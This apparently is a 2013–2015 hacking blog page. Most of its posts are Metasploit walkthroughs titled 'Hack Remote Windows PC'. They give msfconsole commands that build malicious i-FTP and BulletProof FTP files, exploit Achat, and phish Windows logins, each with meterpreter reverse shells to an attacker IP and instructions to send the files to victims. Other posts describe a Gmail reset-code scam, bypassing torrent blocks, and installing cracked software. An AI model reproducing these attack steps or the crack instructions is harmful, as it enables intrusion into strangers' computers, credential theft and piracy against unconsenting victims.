Friday 6 March 2015


Hack Remote Windows PC using i-FTP Schedule Buffer Overflow

 

This module exploits stack-based buffer overflow vulnerability in i-Ftp v2.20, caused by a long time value set for scheduled download. By persuading the victim to place a specially-crafted Schedule.xml file in the i-FTP folder, a remote attacker could execute arbitrary code on the system or cause the application to crash. This module has been tested successfully on Windows XP SP3.

Exploit Targets

i-Ftp v2.20

Requirement

Attacker: kali Linux
Victim PC: Windows XP 3
Open Kali terminal type msfconsole
Now type use exploit/windows/fileformat/iftp_schedule_bof
msf exploit (iftp_schedule_bof)>set payload windows/meterpreter/reverse_tcp
msf exploit (iftp_schedule_bof)>set lhost 192.168.0.107 (IP of Local Host)
msf exploit (iftp_schedule_bof)>exploit

After we successfully generate the malicious xml File, it will stored on your local computer
/root/.msf4/local/schedule.xml

Copy Schedule.xml to C:\Program Files\Memecode\i.Ftp
Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.107
exploit
Now send your schedule.xml files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.
Posted by at No comments:

Hack Remote Windows PC using BulletProof FTP Client BPS Buffer Overflow

This module exploits stack-based buffer overflow vulnerability in BulletProof FTP Client 2010, caused by an overly long hostname. By persuading the victim to open a specially-crafted .BPS file, a remote attacker could execute arbitrary code on the system or cause the application to crash. This module has been tested successfully on Windows XP SP3.

Exploit Targets

BulletProof FTP Client 2010

Requirement

Attacker: kali Linux
Victim PC: Windows XP 3
Open Kali terminal type msfconsole
Now type use exploit/windows/fileformat/bpftp_client_bps_bof
msf exploit (bpftp_client_bps_bof)>set payload windows/meterpreter/reverse_tcp
msf exploit (bpftp_client_bps_bof)>set lhost 192.168.0.107 (IP of Local Host)
msf exploit (bpftp_client_bps_bof)>exploit

After we successfully generate the malicious bps File, it will stored on your local computer
/root/.msf4/local/msf.bps
Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.107
exploit
Now send your msf.bps files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.
Posted by at No comments:

Hack Remote Windows PC using Achat Unicode SEH Buffer Overflow 

This module exploits a Unicode SEH buffer overflow in Achat. By sending a crafted message to the default port 9256/UDP, it’s possible to overwrite the SEH handler. Even when the exploit is reliable, it depends on timing since there are two threads overflowing the stack in the same time. This module has been tested on Achat v0.150 running on Windows XP SP3 and Windows 7.

Exploit Targets

Achat v0.150

Requirement

Attacker: kali Linux
Victim PC: Windows XP SP 3
Open Kali terminal type msfconsole
Now type use exploit/windows/misc/achat_bof
msf exploit (achat_bof)>set payload windows/meterpreter/reverse_tcp
msf exploit (achat_bof)>set lhost 192.168.1.7 (IP of Local Host)
msf exploit (achat_bof)>set rhost 192.168.1.8 (IP of Remote Host)
msf exploit (achat_bof)>exploit

Posted by at No comments:

How to Download from Torrents when Torrent is Block in Your Network

Tribler is an open source anonymous peer-to-peer decentralized Bit Torrent client. Tribler is based on the Bit Torrent protocol and uses an overlay network for content searching, which makes the program operate independent of external websites and renders it immune to limiting external action, for example, government restraint. Due to this overlay network Tribler does not require an external website or indexing service to discover content. The user interface of Tribler is very basic and focused on ease of use, instead of diversity of features. Tribler is available for Linux, Windows, and OS X.
First Download Tribler from here and install in your pc
Now search your desired movies, software and etc. you want to download from torrent
Posted by at No comments:

Hack Remote Windows Password using Phishing Login Prompt Exploit

Hack Remote Windows Password using Phishing Login Prompt Exploit

This module is able to perform a phishing attack on the target by popping up a loginprompt. When the user fills credentials in the loginprompt, the credentials will be sent to the attacker. The module is able to monitor for new processes and popup a loginprompt when a specific process is starting. Tested on Windows 7.

Exploit Targets

Windows 7

Requirement

Attacker: kali Linux
Victim PC: Windows 7
Open Kali terminal type msfconsole
Now type use post/windows/gather/phish_windows_credentials
msf exploit (phish_windows_credentials)>set payload windows/meterpreter/reverse_tcp
msf exploit (phish_windows_credentials)>set lhost 192.168.1.7 (IP of Local Host)
msf exploit (phish_windows_credentials)>set session 1
msf exploit (phish_windows_credentials)>exploit 

Posted by at No comments:

Wednesday 15 May 2013

Gmail SMS Verfication loophole exposed by HackingLoops

gmail mobile verification loophole




Note: If any Google guy is reading this, please raise a CR(change request) to get it fixed as soon as possible.

Gmail is world most famous free email service and its a prominent part of Google but they always pay attention when i expose their loopholes. Like i previously did for GX cookie loophole, which make the hackers to own the users Gmail account from cookies. But Google reaction was quick and they fixed that just 4 business days after i exposed it but that was the temporary solution, they have taken more than month to completely fixed that. So friends, lets me explain you where i have found the new bug, may be all of you know that because its too common service. But you might have missed that. So i will expose it today, so that Google will fix it as soon as possible.



Actually this is not one loophole, there are two big loopholes in SMS verification that i have discovered in Gmail SMS verification and password reset method. So friends from which i start, dangerous one first or mild one first.
ok..ok.. lets save the best one for last.

1. Mobile number as optional Field
As far as i know security norms, Google should make the mobile phone verification mandatory at least at the time of creation of new Gmail account. Following are the benefits of that:
a. Tracing a user will be easier: Hackers uses anonymous or fake Gmail accounts to get keylogger logs and sending fake emails to users. If we have mobile number of the Gmail account user, we can trace him back in just a manner of few seconds.
b. Mobile number and its location should be validated using the Google maps and IP address used for registering the Email account: Hackingloops is suggesting this because as a hacker, i always try to create a spoof account in which almost every detail is wrong. So for complete traceability, it should be validated geographically. I think its not that tough for cool coders to code that stuff.

This loophole is just a minor in its category but it will prove its worth, when some hacker tries to hack anything serious by using a anonymous Gmail account. If Google realizes these things earlier then they can surely put a track on malicious users and can monitor their day to day activity. But as i said until i wont expose the things, they will not fix it. I know everything is not perfect but as a Internet Giant, you guys should be perfect.

2. Forgot Password SMS verification code message
This is extremely dangerous loophole and can be greatly exploited using the Social Engineering technique. Two to three days back, i was talking with one of my client, he was explaining me that his Gmail account has been hacked. He told me that he is aware of all these techniques like Key stroke logging or Phishing that hackers use to hack the email accounts. Below is the scenario between Hackingloops client(Rahul das, works in software firm) and me(Lokesh Singh) explained to me:

Client: My Gmail account has been hacked.
Me(Lokesh): Have you got any email.


Client : Yes, i daily get lot of emails.
Me: I mean any suspicious or unsolicited or Lottery Prize email.


Client : Yes, lot of such emails but i never open any such email and also i haven't open any link from my email.
Me: Ok. Its nice that you are aware of these stuff. May be you have installed some new application or software in your PC or have your hands on some hack tool.


Client: No, i haven't installed anything from last few weeks.
Me: Ok. Then for sure you might have signed up for some new website.


Client : Yes, i signed on one website yesterday and after that only i am unable to login into my account. But i haven't used the same password there that i use for my Gmail.
Me: ok, tell me from where you got to this site means do you find that from Google or somebody has referred that to you.


Client : Yeah, one person having email ID something like earnunlimitedmoney@gmail.com has told me about that site. But today that site is also down.
Me: What was website name.


Client: Something like make money by displaying adds on your website.
Me: ok. Do you know the guy with Email earnmoneyunlimited@gmail.com. means he is friends of your's.


Client: No, i just got his Gtalk invitation, a day back. But i have talked with him personally and he was saying "You will get 50% of my Google Adsense revenue every article you write on my website" 
Me: OK, can tell me did he asked anything special like some registration or mobile verification code or anything similar.


Client: Yes, he told me that you will get a Verfication code from Google on your Mobile, that you need to provide me so that i can attach you with my Google Adsense account.
Me: Can you forward me that message.

Now friends, what will be my reaction after seeing that message..  __|__ fk... what the hell... Message was saying "Your Google Verification code is 516826".  Now anyone of you guessed it... when we get this message.
ok...ok... i give you time to guess... did you all got it... no...ok.. i will tell you..

Its a Google Verification code which you get when you select FORGOT PASSWORD option and then enters your mobile number to get the password reset code...
This is really a dangerous Loophole...Isn't it ... anybody can be fooled using this trick...

If any Gmail or Google employee or staff member is reading it, please ask your boss to raise a change request for this.

Ok..ok.. i make the situation even more worse... Now hacker has resetted my clients passwords, but he was more smarter than i thought....What he has done he changed all recovery options, even the mobile number. Now my client has no chance to get his credentials back. But it was my clients luck that he told me about the scenario and he got his account back and hacker asked sorry for his activites.. :P I hacked the hackers system(PC) using his IP address which i got through readnotify. I will explain that procedure later someday, because its unethical to hack someone...

Lets concentrate on loophole, now consider my point:
Don't you think the password reset message should contain the text password reset code is blah blah... I had never thought of such scenario can happen and anybody can exploit this loophole to that extent. Google guys correct these bugs, this doesn't cost you much but a email account costs much for the user who is having a blind faith on you Guys. 

Some suggestions by HackingLoops:
1. For Gmail Password Reset:
The message can be something like 
" Dear Gmail User(Name), 
Your Gmail Password reset verification code is 123456"
or 
"Dear user,
You have requested a password reset for your Google account (email). Your verification code is 123456".

I think both of them are less than 160 chars and can be easily sent to user and :P can be easily configured in Google SMS module.

2. If Google doesn't want to change much of their functionality, then you can use something like:
Dear user(name),
You have requested a Password Reset verification code for account(email). Your code is 123456".

I think friends, you all have recognized what the loopholes are, and surely some of Google Guy must read this, so just wait how soon Google fixes these loophole..





Posted by at No comments:

Desktop Lock 7.3.1 Final Business Edition Full Version | 1.4 MB


Desktop Lock 7.3.1 Final Business Edition Full Version | 1.4 MB

Posted by Jett Catallorca  |  at  21:56 No comments
Desktop Lock 7.3.1 Final Business Edition Full Version | 1.4 MB

Desktop Lock 7.3.1 Final Business Edition Full Version Free Download | 1.4 MB

Desktop Lock is a computer security protection and access control software product, you can use it to lock computer to prevent people from accessing your private documents and resources. When the computer is locked by Desktop Lock, none can access your documents, browse your computer, or use programs on your computer.

You can lock your computer by one click, or let Desktop Lock to automatically lock your system at any time or when system becomes idle. You can customize the appearances of the locked desktop with the options provided byDesktop Lock. Desktop Lock also supports hotkey to lock the system.

Use Desktop Lock to:
  • Lock your system to prevent anyone from accessing your private data or using your computer at any time.
  • Automatically detect the state of your computer, then automatically lock your system if it detected that you have not used the computer (the system becomes idle) for a period of time.
  • Lock the system and play any audio or video file on the screen, so that people can view the media on your computer but can not control your computer.
  • Lock the system and run a program on the desktop, then anyone can only use the one and only program on your computer, and can not close the program.
  • This security software also can be used with any computer that want to show flash or PowerPoint files to others but don't want them to access your computer.
  • With the new Virtual Screen tool, Desktop Lock can also create virtual desktops and show only the specific programs to users, users only can use the specific programs on your computer.


Here are some key features of "Desktop Lock":
  • During locking, none can force it to be terminated by using the "Task Manager" or "Ctrl+Alt+Del" key combination.
  • Supports to lock the system automatically when the system become idle
  • Supports to automatically lock the system at the specific time
  • Supports to automatically lock the system after computer booted
  • Supports to keep locking if anyone forced the locked computer to be restarted by pressing the Power button on the computer tower, or plug off the power supply
  • Provides more features to allow you to customize your own locked desktop
  • Supports hotkey to lock system directly
  • Allows visitors to leave messages during locking
  • Supports to show the banner during locking with any lock mode
  • A powerful "Virtual Screen" tool allows you to create virtual desktop
  • Plays media file during locking, the media file can be any video or audio file that supported by Microsoft Media Player
  • Supports to specify a program to be automatically run during locking
  • Desktop Lock can disable screensaver during locking; Desktop Lock will also prevent users from shutting down Windows during locking
  • Supports schedule feature
  • Supports multiple monitors
  • Supports multiple users

Screenshots:

Desktop Lock 7.3.1 Final Business Edition Full Version | 1.4 MB

Desktop Lock 7.3.1 Final Business Edition Full Version | 1.4 MB

OS : Windows XP, 2003, Vista, 7, 8

Language : English

Install Notes:
1] Install The App
2] Do Not Launch The App
3] Copy Content from Crack Folder to Install Directory
4] Enjoy This Release!!
Posted by at No comments:
Subscribe to: Posts (Atom)